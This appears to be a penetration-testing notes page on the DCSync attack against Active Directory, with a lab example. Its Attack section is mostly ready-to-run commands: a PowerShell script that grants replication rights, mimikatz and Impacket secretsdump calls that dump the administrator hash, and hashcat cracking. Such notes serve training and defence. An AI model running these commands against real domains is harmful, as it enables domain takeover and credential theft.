DCSync

Concept

AD environments often use multiple DCs for redundancy. These DCs synchronize using Directory Replication Service Remote Protocol (DRSR). DCSync is a late-phase attack that allows an attacker to impersonate a DC and then dump ntds.dit.

DCs do not verify the source of a replication request. They only check that the Security Identifier (SID) used has appropriate privileges.

To perform this attack, we must have control over an account that has the rights to perform domain replication, aka DCSync rights:

1. Replicating Directory Changes

2. Replicating Directory Changes All

3. Replication-Get-Changes-In-Filtered-Set (sometimes)

These rights are granted by default to Domain Admins, Enterprise Admins, and Administrators.

If we have WriteDacl rights over an account, we can assign DCSync rights to it. For instance, the Windows Exchange Permissions group has DCSync rights. For an example of a DCSync attack using the WriteDacl permission see Forest.

Attack

Windows

We can enumerate permissions using an elevated CMD or PS session.

# Command Prompt
dsacls "DC=domain,DC=local"
# PowerShell
Get-DomainObjectAcl -Identity <USER> -Domain domain.local -ResolveGUIDs

We can assign DCSync rights manually or automatically using PowerView or DCSync.py.

The manual way is explained here.

# Manually
$acl = get-acl "ad:DC=domain,DC=local"
$id = [Security.Principal.WindowsIdentity]::GetCurrent()
$user = Get-ADUser -Identity $id.User
$sid = new-object System.Security.Principal.SecurityIdentifier $user.SID
# rightsGuid for the extended right Ds-Replication-Get-Changes-All
$objectguid = new-object Guid  1131f6ad-9c07-11d1-f79f-00c04fc2dcd2
$identity = [System.Security.Principal.IdentityReference] $sid
$adRights = [System.DirectoryServices.ActiveDirectoryRights] "ExtendedRight"
$type = [System.Security.AccessControl.AccessControlType] "Allow"
$inheritanceType = [System.DirectoryServices.ActiveDirectorySecurityInheritance] "None"
$ace = new-object System.DirectoryServices.ActiveDirectoryAccessRule $identity,$adRights,$type,$objectGuid,$inheritanceType
$acl.AddAccessRule($ace)
# rightsGuid for the extended right Ds-Replication-Get-Changes
$objectguid = new-object Guid 1131f6aa-9c07-11d1-f79f-00c04fc2dcd2
$ace = new-object System.DirectoryServices.ActiveDirectoryAccessRule $identity,$adRights,$type,$objectGuid,$inheritanceType
$acl.AddAccessRule($ace)
Set-acl -aclobject $acl "ad:DC=domain,DC=local"

# PowerView
Add-DomainObjectAcl -TargetIdentity "DC=domain,DC=local" -PrincipalIdentity <USER> -Rights DCSync

Once the rights have been assigned, we can perform the attack with mimikatz.

# Mimikatz (PS script)
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\administrator"'
# Mimikatz (binary)
mimikatz # lsadump::dcsync /domain:DOMAIN.LOCAL /user:administrator

Finally, we can crack the hash using hashcat on our attacking machine.

hashcat -m 1000 hashes.dcsync rockyou.txt \
  -r /usr/share/hashcat/rules/best64.rule --force

Linux

We can assign DCSync rights using DCSync.py.

# DCSync.py
DCSync.py -dc domain.local -t 'CN=<USER>,CN=Users,DC=domain,DC=local' 'domain.local\<USER>:<PASS>'

We can also perform the attack with NetExec or Impacket's secretsdump script.

# NetExec
nxc smb 10.10.10.161 -u '<USER>' -p '<PASS>' --ntds --user administrator

# Impacket's secretsdump
impacket-secretsdump htb.local/hacker@10.10.10.161 -just-dc-user administrator

For an example of a DCSync attack using DCSync.py and secretsdump.py see here. For an example of a DCSync attack using NetExec see here.

Finally, we can crack the hash using hashcat on our attacking machine.

hashcat -m 1000 hashes.dcsync rockyou.txt \
  -r /usr/share/hashcat/rules/best64.rule --force

Resources

DCSync

A primer on DCSync attack and detectionAltered Security

A great article about the DCSync attack.

Secretsump

How Secretsdump script work behind the scenes!

dsacls

DsaclsMicrosoftLearn